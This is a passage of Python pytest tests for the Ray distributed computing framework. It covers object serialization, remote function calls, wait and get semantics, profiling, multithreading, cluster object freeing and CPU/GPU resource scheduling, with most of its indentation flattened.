def ray_start():
# Start the Ray processes.
ray.init(num_cpus=1)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
@pytest.fixture
def shutdown_only():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
def test_passing_arguments_by_value(ray_start):
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in RAY_TEST_OBJECTS:
assert_equal(obj, ray.get(f.remote(obj)))
def test_ray_recursive_objects(ray_start):
class ClassA(object):
pass
# Make a list that contains itself.
lst = []
lst.append(lst)
# Make an object that contains itself as a field.
a1 = ClassA()
a1.field = a1
# Make two objects that contain each other as fields.
a2 = ClassA()
a3 = ClassA()
a2.field = a3
a3.field = a2
# Make a dictionary that contains itself.
d1 = {}
d1["key"] = d1
# Create a list of recursive objects.
recursive_objects = [lst, a1, a2, a3, d1]
# Check that exceptions are thrown when we serialize the recursive
# objects.
for obj in recursive_objects:
with pytest.raises(Exception):
ray.put(obj)
def test_passing_arguments_by_value_out_of_the_box(ray_start):
@ray.remote
def f(x):
return x
# Test passing lambdas.
def temp():
return 1
assert ray.get(f.remote(temp))() == 1
assert ray.get(f.remote(lambda x: x + 1))(3) == 4
# Test sets.
assert ray.get(f.remote(set())) == set()
s = {1, (1, 2, "hi")}
assert ray.get(f.remote(s)) == s
# Test types.
assert ray.get(f.remote(int)) == int
assert ray.get(f.remote(float)) == float
assert ray.get(f.remote(str)) == str
class Foo(object):
def __init__(self):
pass
# Make sure that we can put and get a custom type. Note that the result
# won't be "equal" to Foo.
ray.get(ray.put(Foo))
def test_putting_object_that_closes_over_object_id(ray_start):
# This test is here to prevent a regression of
# https://github.com/ray-project/ray/issues/1317.
class Foo(object):
def __init__(self):
self.val = ray.put(0)
def method(self):
f
f = Foo()
with pytest.raises(ray.raylet.common_error):
ray.put(f)
def test_put_get(shutdown_only):
ray.init(num_cpus=0)
for i in range(100):
value_before = i * 10**6
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = i * 10**6 * 1.0
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = "h" * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = [1] * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
def test_custom_serializers(shutdown_only):
ray.init(num_cpus=1)
class Foo(object):
def __init__(self):
self.x = 3
def custom_serializer(obj):
return 3, "string1", type(obj).__name__
def custom_deserializer(serialized_obj):
return serialized_obj, "string2"
ray.register_custom_serializer(
Foo, serializer=custom_serializer, deserializer=custom_deserializer)
assert ray.get(ray.put(Foo())) == ((3, "string1", Foo.__name__), "string2")
class Bar(object):
def __init__(self):
self.x = 3
ray.register_custom_serializer(
Bar, serializer=custom_serializer, deserializer=custom_deserializer)
@ray.remote
def f():
return Bar()
assert ray.get(f.remote()) == ((3, "string1", Bar.__name__), "string2")
def test_serialization_final_fallback(ray_start):
pytest.importorskip("catboost")
# This test will only run when "catboost" is installed.
from catboost import CatBoostClassifier
model = CatBoostClassifier(
iterations=2,
depth=2,
learning_rate=1,
loss_function="Logloss",
logging_level="Verbose")
reconstructed_model = ray.get(ray.put(model))
assert set(model.get_params().items()) == set(
reconstructed_model.get_params().items())
def test_register_class(shutdown_only):
ray.init(num_cpus=2)
    # Check that an object of a class that has not been explicitly registered
    # can still be put and retrieved (the class is registered automatically).
class TempClass(object):
pass
ray.get(ray.put(TempClass()))
# Test subtypes of dictionaries.
value_before = OrderedDict([("hello", 1), ("world", 2)])
object_id = ray.put(value_before)
assert value_before == ray.get(object_id)
value_before = defaultdict(lambda: 0, [("hello", 1), ("world", 2)])
object_id = ray.put(value_before)
assert value_before == ray.get(object_id)
value_before = defaultdict(lambda: [], [("hello", 1), ("world", 2)])
object_id = ray.put(value_before)
assert value_before == ray.get(object_id)
# Test passing custom classes into remote functions from the driver.
@ray.remote
def f(x):
return x
foo = ray.get(f.remote(Foo(7)))
assert foo == Foo(7)
regex = re.compile(r"\d+\.\d*")
new_regex = ray.get(f.remote(regex))
# This seems to fail on the system Python 3 that comes with
# Ubuntu, so it is commented out for now:
# assert regex == new_regex
# Instead, we do this:
assert regex.pattern == new_regex.pattern
# Test returning custom classes created on workers.
@ray.remote
def g():
return SubQux(), Qux()
subqux, qux = ray.get(g.remote())
assert subqux.objs[2].foo.value == 0
# Test exporting custom class definitions from one worker to another
# when the worker is blocked in a get.
class NewTempClass(object):
def __init__(self, value):
self.value = value
@ray.remote
def h1(x):
return NewTempClass(x)
@ray.remote
def h2(x):
return ray.get(h1.remote(x))
assert ray.get(h2.remote(10)).value == 10
# Test registering multiple classes with the same name.
@ray.remote(num_return_vals=3)
def j():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = []
for _ in range(5):
results += j.remote()
for i in range(len(results) // 3):
c0, c1, c2 = ray.get(results[(3 * i):(3 * (i + 1))])
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
@ray.remote
def k():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = ray.get([k.remote() for _ in range(5)])
for c0, c1, c2 in results:
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
def test_keyword_args(shutdown_only):
@ray.remote
def keyword_fct1(a, b="hello"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct2(a="hello", b="world"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct3(a, b, c="hello", d="world"):
return "{} {} {} {}".format(a, b, c, d)
ray.init(num_cpus=1)
x = keyword_fct1.remote(1)
assert ray.get(x) == "1 hello"
x = keyword_fct1.remote(1, "hi")
assert ray.get(x) == "1 hi"
x = keyword_fct1.remote(1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct1.remote(a=1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct2.remote(a="w", b="hi")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(b="hi", a="w")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(a="w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote(b="hi")
assert ray.get(x) == "hello hi"
x = keyword_fct2.remote("w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote("w", "hi")
assert ray.get(x) == "w hi"
x = keyword_fct3.remote(0, 1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(a=0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, d="hi", c="w")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, c="w")
assert ray.get(x) == "0 1 w world"
x = keyword_fct3.remote(0, 1, d="hi")
assert ray.get(x) == "0 1 hello hi"
x = keyword_fct3.remote(0, 1)
assert ray.get(x) == "0 1 hello world"
x = keyword_fct3.remote(a=0, b=1)
assert ray.get(x) == "0 1 hello world"
# Check that we cannot pass invalid keyword arguments to functions.
@ray.remote
def f1():
return
@ray.remote
def f2(x, y=0, z=0):
return
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f1.remote(3)
with pytest.raises(Exception):
f1.remote(x=3)
with pytest.raises(Exception):
f2.remote(0, w=0)
with pytest.raises(Exception):
f2.remote(3, x=3)
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f2.remote(1, 2, 3, 4)
@ray.remote
def f3(x):
return x
assert ray.get(f3.remote(4)) == 4
def test_variable_number_of_args(shutdown_only):
@ray.remote
def varargs_fct1(*a):
return " ".join(map(str, a))
@ray.remote
def varargs_fct2(a, *b):
return " ".join(map(str, b))
try:
@ray.remote
def kwargs_throw_exception(**c):
return ()
kwargs_exception_thrown = False
except Exception:
kwargs_exception_thrown = True
ray.init(num_cpus=1)
x = varargs_fct1.remote(0, 1, 2)
assert ray.get(x) == "0 1 2"
x = varargs_fct2.remote(0, 1, 2)
assert ray.get(x) == "1 2"
assert kwargs_exception_thrown
@ray.remote
def f1(*args):
return args
@ray.remote
def f2(x, y, *args):
return x, y, args
assert ray.get(f1.remote()) == ()
assert ray.get(f1.remote(1)) == (1, )
assert ray.get(f1.remote(1, 2, 3)) == (1, 2, 3)
with pytest.raises(Exception):
f2.remote()
with pytest.raises(Exception):
f2.remote(1)
assert ray.get(f2.remote(1, 2)) == (1, 2, ())
assert ray.get(f2.remote(1, 2, 3)) == (1, 2, (3, ))
assert ray.get(f2.remote(1, 2, 3, 4)) == (1, 2, (3, 4))
def test_no_args(shutdown_only):
    ray.init(num_cpus=1)
    @ray.remote
    def no_op():
        pass
    ray.get(no_op.remote())
def test_defining_remote_functions(shutdown_only):
ray.init(num_cpus=3)
# Test that we can define a remote function in the shell.
@ray.remote
def f(x):
return x + 1
assert ray.get(f.remote(0)) == 1
# Test that we can redefine the remote function.
@ray.remote
def f(x):
return x + 10
while True:
val = ray.get(f.remote(0))
assert val in [1, 10]
if val == 10:
break
else:
logger.info("Still using old definition of f, trying again.")
# Test that we can close over plain old data.
data = [
np.zeros([3, 5]), (1, 2, "a"), [0.0, 1.0, 1 << 62], 1 << 60, {
"a": np.zeros(3)
}
]
@ray.remote
def g():
return data
ray.get(g.remote())
# Test that we can close over modules.
@ray.remote
def h():
return np.zeros([3, 5])
assert_equal(ray.get(h.remote()), np.zeros([3, 5]))
@ray.remote
def j():
return time.time()
ray.get(j.remote())
# Test that we can define remote functions that call other remote
# functions.
@ray.remote
def k(x):
return x + 1
@ray.remote
def k2(x):
return ray.get(k.remote(x))
@ray.remote
def m(x):
return ray.get(k2.remote(x))
assert ray.get(k.remote(1)) == 2
assert ray.get(k2.remote(1)) == 2
assert ray.get(m.remote(1)) == 2
def test_submit_api(shutdown_only):
ray.init(num_cpus=1, num_gpus=1, resources={"Custom": 1})
@ray.remote
def f(n):
return list(range(n))
@ray.remote
def g():
return ray.get_gpu_ids()
assert f._remote([0], num_return_vals=0) is None
id1 = f._remote(args=[1], num_return_vals=1)
assert ray.get(id1) == [0]
id1, id2 = f._remote(args=[2], num_return_vals=2)
assert ray.get([id1, id2]) == [0, 1]
id1, id2, id3 = f._remote(args=[3], num_return_vals=3)
assert ray.get([id1, id2, id3]) == [0, 1, 2]
assert ray.get(
g._remote(
args=[], num_cpus=1, num_gpus=1,
resources={"Custom": 1})) == [0]
infeasible_id = g._remote(args=[], resources={"NonexistentCustom": 1})
ready_ids, remaining_ids = ray.wait([infeasible_id], timeout=0.05)
assert len(ready_ids) == 0
assert len(remaining_ids) == 1
@ray.remote
class Actor(object):
def __init__(self, x, y=0):
self.x = x
self.y = y
def method(self, a, b=0):
return self.x, self.y, a, b
def gpu_ids(self):
return ray.get_gpu_ids()
a = Actor._remote(
args=[0], kwargs={"y": 1}, num_gpus=1, resources={"Custom": 1})
id1, id2, id3, id4 = a.method._remote(
args=["test"], kwargs={"b": 2}, num_return_vals=4)
assert ray.get([id1, id2, id3, id4]) == [0, 1, "test", 2]
def test_get_multiple(shutdown_only):
ray.init(num_cpus=1)
object_ids = [ray.put(i) for i in range(10)]
assert ray.get(object_ids) == list(range(10))
# Get a random choice of object IDs with duplicates.
indices = list(np.random.choice(range(10), 5))
indices += indices
results = ray.get([object_ids[i] for i in indices])
assert results == indices
def test_get_multiple_experimental(shutdown_only):
ray.init(num_cpus=1)
object_ids = [ray.put(i) for i in range(10)]
object_ids_tuple = tuple(object_ids)
assert ray.experimental.get(object_ids_tuple) == list(range(10))
object_ids_nparray = np.array(object_ids)
assert ray.experimental.get(object_ids_nparray) == list(range(10))
def test_get_dict(shutdown_only):
ray.init(num_cpus=1)
d = {str(i): ray.put(i) for i in range(5)}
for i in range(5, 10):
d[str(i)] = i
result = ray.experimental.get(d)
expected = {str(i): i for i in range(10)}
assert result == expected
def test_wait(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
ready_ids, remaining_ids = ray.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
ready_ids, remaining_ids = ray.wait(objectids, num_returns=4)
assert set(ready_ids) == set(objectids)
assert remaining_ids == []
objectids = [f.remote(0.5), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=1.75, num_returns=4)
assert time.time() - start_time < 2
assert len(ready_ids) == 3
assert len(remaining_ids) == 1
ray.wait(objectids)
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=5.0)
assert time.time() - start_time < 5
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
# Verify that calling wait with duplicate object IDs throws an
# exception.
x = ray.put(1)
with pytest.raises(Exception):
ray.wait([x, x])
# Make sure it is possible to call wait with an empty list.
ready_ids, remaining_ids = ray.wait([])
assert ready_ids == []
assert remaining_ids == []
# Test semantics of num_returns with no timeout.
oids = [ray.put(i) for i in range(10)]
(found, rest) = ray.wait(oids, num_returns=2)
assert len(found) == 2
assert len(rest) == 8
# Verify that incorrect usage raises a TypeError.
x = ray.put(1)
with pytest.raises(TypeError):
ray.wait(x)
with pytest.raises(TypeError):
ray.wait(1)
with pytest.raises(TypeError):
ray.wait([1])
def test_wait_iterables(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = (f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5))
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
objectids = np.array(
[f.remote(1.0),
f.remote(0.5),
f.remote(0.5),
f.remote(0.5)])
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
def test_multiple_waits_and_gets(shutdown_only):
# It is important to use three workers here, so that the three tasks
# launched in this experiment can run at the same time.
ray.init(num_cpus=3)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
@ray.remote
def g(l):
# The argument l should be a list containing one object ID.
ray.wait([l[0]])
@ray.remote
def h(l):
# The argument l should be a list containing one object ID.
ray.get(l[0])
# Make sure that multiple wait requests involving the same object ID
# all return.
x = f.remote(1)
ray.get([g.remote([x]), g.remote([x])])
# Make sure that multiple get requests involving the same object ID all
# return.
x = f.remote(1)
ray.get([h.remote([x]), h.remote([x])])
def test_caching_functions_to_run(shutdown_only):
# Test that we export functions to run on all workers before the driver
# is connected.
def f(worker_info):
sys.path.append(1)
ray.worker.global_worker.run_function_on_all_workers(f)
def f(worker_info):
sys.path.append(2)
ray.worker.global_worker.run_function_on_all_workers(f)
def g(worker_info):
sys.path.append(3)
ray.worker.global_worker.run_function_on_all_workers(g)
def f(worker_info):
sys.path.append(4)
ray.worker.global_worker.run_function_on_all_workers(f)
ray.init(num_cpus=1)
@ray.remote
def get_state():
time.sleep(1)
return sys.path[-4], sys.path[-3], sys.path[-2], sys.path[-1]
res1 = get_state.remote()
res2 = get_state.remote()
assert ray.get(res1) == (1, 2, 3, 4)
assert ray.get(res2) == (1, 2, 3, 4)
# Clean up the path on the workers.
def f(worker_info):
sys.path.pop()
sys.path.pop()
sys.path.pop()
sys.path.pop()
ray.worker.global_worker.run_function_on_all_workers(f)
def test_running_function_on_all_workers(shutdown_only):
ray.init(num_cpus=1)
def f(worker_info):
sys.path.append("fake_directory")
ray.worker.global_worker.run_function_on_all_workers(f)
@ray.remote
def get_path1():
return sys.path
assert "fake_directory" == ray.get(get_path1.remote())[-1]
def f(worker_info):
sys.path.pop(-1)
ray.worker.global_worker.run_function_on_all_workers(f)
# Create a second remote function to guarantee that when we call
# get_path2.remote(), the second function to run will have been run on
# the worker.
@ray.remote
def get_path2():
return sys.path
assert "fake_directory" not in ray.get(get_path2.remote())
def test_profiling_api(shutdown_only):
ray.init(num_cpus=2)
@ray.remote
def f():
with ray.profile(
"custom_event",
extra_data={"name": "custom name"}) as ray_prof:
ray_prof.set_attribute("key", "value")
ray.put(1)
object_id = f.remote()
ray.wait([object_id])
ray.get(object_id)
# Wait until all of the profiling information appears in the profile
# table.
timeout_seconds = 20
start_time = time.time()
while True:
if time.time() - start_time > timeout_seconds:
raise Exception("Timed out while waiting for information in "
"profile table.")
profile_data = ray.global_state.chrome_tracing_dump()
event_types = {event["cat"] for event in profile_data}
expected_types = [
"worker_idle",
"task",
"task:deserialize_arguments",
"task:execute",
"task:store_outputs",
"wait_for_function",
"ray.get",
"ray.put",
"ray.wait",
"submit_task",
"fetch_and_run_function",
"register_remote_function",
"custom_event", # This is the custom one from ray.profile.
]
if all(expected_type in event_types
for expected_type in expected_types):
break
@pytest.fixture()
def ray_start_cluster():
cluster = ray.test.cluster_utils.Cluster()
yield cluster
# The code after the yield will run as teardown code.
ray.shutdown()
cluster.shutdown()
def test_object_transfer_dump(ray_start_cluster):
cluster = ray_start_cluster
num_nodes = 3
for i in range(num_nodes):
cluster.add_node(resources={str(i): 1}, object_store_memory=10**9)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f(x):
return
# These objects will live on different nodes.
object_ids = [
f._remote(args=[1], resources={str(i): 1}) for i in range(num_nodes)
]
# Broadcast each object from each machine to each other machine.
for object_id in object_ids:
ray.get([
f._remote(args=[object_id], resources={str(i): 1})
for i in range(num_nodes)
])
# The profiling information only flushes once every second.
time.sleep(1.1)
transfer_dump = ray.global_state.chrome_tracing_object_transfer_dump()
# Make sure the transfer dump can be serialized with JSON.
json.loads(json.dumps(transfer_dump))
assert len(transfer_dump) >= num_nodes**2
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_receive"
}) == num_nodes
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_send"
}) == num_nodes
def test_identical_function_names(shutdown_only):
# Define a bunch of remote functions and make sure that we don't
# accidentally call an older version.
ray.init(num_cpus=1)
num_calls = 200
@ray.remote
def f():
return 1
results1 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 2
results2 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 3
results3 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 4
results4 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 5
results5 = [f.remote() for _ in range(num_calls)]
assert ray.get(results1) == num_calls * [1]
assert ray.get(results2) == num_calls * [2]
assert ray.get(results3) == num_calls * [3]
assert ray.get(results4) == num_calls * [4]
assert ray.get(results5) == num_calls * [5]
@ray.remote
def g():
return 1
@ray.remote # noqa: F811
def g():
return 2
@ray.remote # noqa: F811
def g():
return 3
@ray.remote # noqa: F811
def g():
return 4
@ray.remote # noqa: F811
def g():
return 5
result_values = ray.get([g.remote() for _ in range(num_calls)])
assert result_values == num_calls * [5]
def test_illegal_api_calls(shutdown_only):
ray.init(num_cpus=1)
# Verify that we cannot call put on an ObjectID.
x = ray.put(1)
with pytest.raises(Exception):
ray.put(x)
# Verify that we cannot call get on a regular value.
with pytest.raises(Exception):
ray.get(3)
def test_multithreading(shutdown_only):
# This test requires at least 2 CPUs to finish since the worker does not
    # release resources when joining the threads.
ray.init(num_cpus=2)
def run_test_in_multi_threads(test_case, num_threads=20, num_repeats=50):
"""A helper function that runs test cases in multiple threads."""
def wrapper():
for _ in range(num_repeats):
test_case()
time.sleep(random.randint(0, 10) / 1000.0)
return "ok"
executor = ThreadPoolExecutor(max_workers=num_threads)
futures = [executor.submit(wrapper) for _ in range(num_threads)]
for future in futures:
assert future.result() == "ok"
@ray.remote
def echo(value, delay_ms=0):
if delay_ms > 0:
time.sleep(delay_ms / 1000.0)
return value
@ray.remote
class Echo(object):
def echo(self, value):
return value
def test_api_in_multi_threads():
"""Test using Ray api in multiple threads."""
# Test calling remote functions in multiple threads.
def test_remote_call():
value = random.randint(0, 1000000)
result = ray.get(echo.remote(value))
assert value == result
run_test_in_multi_threads(test_remote_call)
# Test multiple threads calling one actor.
actor = Echo.remote()
def test_call_actor():
value = random.randint(0, 1000000)
result = ray.get(actor.echo.remote(value))
assert value == result
run_test_in_multi_threads(test_call_actor)
# Test put and get.
def test_put_and_get():
value = random.randint(0, 1000000)
result = ray.get(ray.put(value))
assert value == result
run_test_in_multi_threads(test_put_and_get)
# Test multiple threads waiting for objects.
num_wait_objects = 10
objects = [
echo.remote(i, delay_ms=10) for i in range(num_wait_objects)
]
def test_wait():
ready, _ = ray.wait(
objects,
num_returns=len(objects),
timeout=1000,
)
assert len(ready) == num_wait_objects
assert ray.get(ready) == list(range(num_wait_objects))
run_test_in_multi_threads(test_wait, num_repeats=1)
# Run tests in a driver.
test_api_in_multi_threads()
# Run tests in a worker.
@ray.remote
def run_tests_in_worker():
test_api_in_multi_threads()
return "ok"
assert ray.get(run_tests_in_worker.remote()) == "ok"
# Test actor that runs background threads.
@ray.remote
class MultithreadedActor(object):
def __init__(self):
self.lock = threading.Lock()
self.thread_results = []
def background_thread(self, wait_objects):
try:
# Test wait
ready, _ = ray.wait(
wait_objects,
num_returns=len(wait_objects),
timeout=1000,
)
assert len(ready) == len(wait_objects)
for _ in range(50):
num = 20
# Test remote call
results = [echo.remote(i) for i in range(num)]
assert ray.get(results) == list(range(num))
# Test put and get
objects = [ray.put(i) for i in range(num)]
assert ray.get(objects) == list(range(num))
time.sleep(random.randint(0, 10) / 1000.0)
except Exception as e:
with self.lock:
self.thread_results.append(e)
else:
with self.lock:
self.thread_results.append("ok")
def spawn(self):
wait_objects = [echo.remote(i, delay_ms=10) for i in range(20)]
self.threads = [
threading.Thread(
target=self.background_thread, args=(wait_objects, ))
for _ in range(20)
]
[thread.start() for thread in self.threads]
def join(self):
[thread.join() for thread in self.threads]
assert self.thread_results == ["ok"] * len(self.threads)
return "ok"
actor = MultithreadedActor.remote()
actor.spawn.remote()
    assert ray.get(actor.join.remote()) == "ok"
def test_free_objects_multi_node(ray_start_cluster):
    # This test does the following:
# 1. Create 3 raylets that each hold an actor.
# 2. Each actor creates an object which is the deletion target.
# 3. Invoke 64 methods on each actor to flush plasma client.
# 4. After flushing, the plasma client releases the targets.
# 5. Check that the deletion targets have been deleted.
# Caution: if remote functions are used instead of actor methods,
# one raylet may create more than one worker to execute the
# tasks, so the flushing operations may be executed in different
# workers and the plasma client holding the deletion target
# may not be flushed.
cluster = ray_start_cluster
config = json.dumps({"object_manager_repeated_push_delay_ms": 1000})
for i in range(3):
cluster.add_node(
num_cpus=1,
resources={"Custom{}".format(i): 1},
_internal_config=config)
ray.init(redis_address=cluster.redis_address)
@ray.remote(resources={"Custom0": 1})
class ActorOnNode0(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"Custom1": 1})
class ActorOnNode1(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"Custom2": 1})
class ActorOnNode2(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
def create(actors):
a = actors[0].get.remote()
b = actors[1].get.remote()
c = actors[2].get.remote()
(l1, l2) = ray.wait([a, b, c], num_returns=3)
assert len(l1) == 3
assert len(l2) == 0
return (a, b, c)
def flush(actors):
# Flush the Release History.
        # The current plasma client cache maintains a 64-item list.
        # If that number changes, this test will fail.
logger.info("Start Flush!")
for i in range(64):
ray.get([actor.get.remote() for actor in actors])
logger.info("Flush finished!")
def run_one_test(actors, local_only):
(a, b, c) = create(actors)
# The three objects should be generated on different object stores.
assert ray.get(a) != ray.get(b)
assert ray.get(a) != ray.get(c)
assert ray.get(c) != ray.get(b)
ray.internal.free([a, b, c], local_only=local_only)
flush(actors)
return (a, b, c)
actors = [
ActorOnNode0.remote(),
ActorOnNode1.remote(),
ActorOnNode2.remote()
]
# Case 1: run this local_only=False. All 3 objects will be deleted.
(a, b, c) = run_one_test(actors, False)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=1)
# All the objects are deleted.
assert len(l1) == 0
assert len(l2) == 3
# Case 2: run this local_only=True. Only 1 object will be deleted.
(a, b, c) = run_one_test(actors, True)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=3)
# One object is deleted and 2 objects are not.
assert len(l1) == 2
assert len(l2) == 1
    # The deleted object will be the one on the same store as the driver.
local_return = ray.worker.global_worker.plasma_client.store_socket_name
for object_id in l1:
assert ray.get(object_id) != local_return
def test_local_mode(shutdown_only):
@ray.remote
def local_mode_f():
return np.array([0, 0])
@ray.remote
def local_mode_g(x):
x[0] = 1
return x
ray.init(local_mode=True)
@ray.remote
def f():
return np.ones([3, 4, 5])
xref = f.remote()
# Remote functions should return by value.
assert_equal(xref, np.ones([3, 4, 5]))
# Check that ray.get is the identity.
assert_equal(xref, ray.get(xref))
y = np.random.normal(size=[11, 12])
# Check that ray.put is the identity.
assert_equal(y, ray.put(y))
    # Make sure objects are immutable; this example is why we need to copy
    # arguments before passing them into remote functions in python mode.
aref = local_mode_f.remote()
assert_equal(aref, np.array([0, 0]))
bref = local_mode_g.remote(aref)
# Make sure local_mode_g does not mutate aref.
assert_equal(aref, np.array([0, 0]))
assert_equal(bref, np.array([1, 0]))
# wait should return the first num_returns values passed in as the
# first list and the remaining values as the second list
num_returns = 5
object_ids = [ray.put(i) for i in range(20)]
ready, remaining = ray.wait(
object_ids, num_returns=num_returns, timeout=None)
assert_equal(ready, object_ids[:num_returns])
assert_equal(remaining, object_ids[num_returns:])
# Test actors in LOCAL_MODE.
@ray.remote
class LocalModeTestClass(object):
def __init__(self, array):
self.array = array
def set_array(self, array):
self.array = array
def get_array(self):
return self.array
def modify_and_set_array(self, array):
array[0] = -1
self.array = array
test_actor = LocalModeTestClass.remote(np.arange(10))
# Remote actor functions should return by value
assert_equal(test_actor.get_array.remote(), np.arange(10))
test_array = np.arange(10)
# Remote actor functions should not mutate arguments
test_actor.modify_and_set_array.remote(test_array)
assert_equal(test_array, np.arange(10))
# Remote actor functions should keep state
test_array[0] = -1
assert_equal(test_array, test_actor.get_array.remote())
# Check that actor handles work in Python mode.
@ray.remote
def use_actor_handle(handle):
array = np.ones(10)
handle.set_array.remote(array)
assert np.alltrue(array == ray.get(handle.get_array.remote()))
ray.get(use_actor_handle.remote(test_actor))
def test_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=2)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
time_buffer = 0.3
# At most 10 copies of this can run at once.
@ray.remote(num_cpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(10)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(11)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_cpus=3)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_gpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(2)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_multi_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=10)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
@ray.remote(num_cpus=1, num_gpus=9)
def f(n):
time.sleep(n)
@ray.remote(num_cpus=9, num_gpus=1)
def g(n):
time.sleep(n)
time_buffer = 0.3
start_time = time.time()
ray.get([f.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5), g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_gpu_ids(shutdown_only):
num_gpus = 10
ray.init(num_cpus=10, num_gpus=num_gpus)
@ray.remote(num_gpus=0)
def f0():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
